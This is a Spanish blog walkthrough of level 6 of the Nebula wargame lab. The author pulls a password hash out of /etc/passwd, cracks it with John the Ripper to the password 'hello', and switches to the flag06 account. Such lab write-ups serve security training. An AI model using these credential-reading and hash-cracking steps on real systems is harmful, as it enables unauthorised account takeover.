Seguimos avanzando con la máquina Nebula, vamos por el nivel 6:
level06@nebula:/home/flag05$ cd /home/flag06
level06@nebula:/home/flag06$ ls -al
total 5
drwxr-x--- 2 flag06 level06 66 2011-11-20 20:51 .
drwxr-xr-x 1 root root 140 2012-08-27 07:18 ..
-rw-r--r-- 1 flag06 flag06 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag06 flag06 3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag06 flag06 675 2011-05-18 02:54 .profile
level06@nebula:/home/flag06$ find / -user flag06 2>/dev/null
/home/flag06
/home/flag06/.bash_logout
/home/flag06/.bashrc
/home/flag06/.profile
Parece ser que flag06 no es demasiado productivo, ¿quién puede tener más información sobre este usuario?
level06@nebula:/home/flag06$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
Por supuesto que esto no debería de estar aquí :) Llamaremos a nuestro amigo
john
a ver si puede echarnos una mano:
dpc@kernelinside:~$ echo flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh > flag06
dpc@kernelinside:~$ john flag06
Created directory: /home/dpc/.john
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (flag06)
1g 0:00:00:00 100% 2/3 16.66g/s 12550p/s 12550c/s 12550C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Eureka! El password hello no parece muy seguro desde luego...
level06@nebula:/home/flag06$ su flag06
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
Pwned!
No hay comentarios:
Publicar un comentario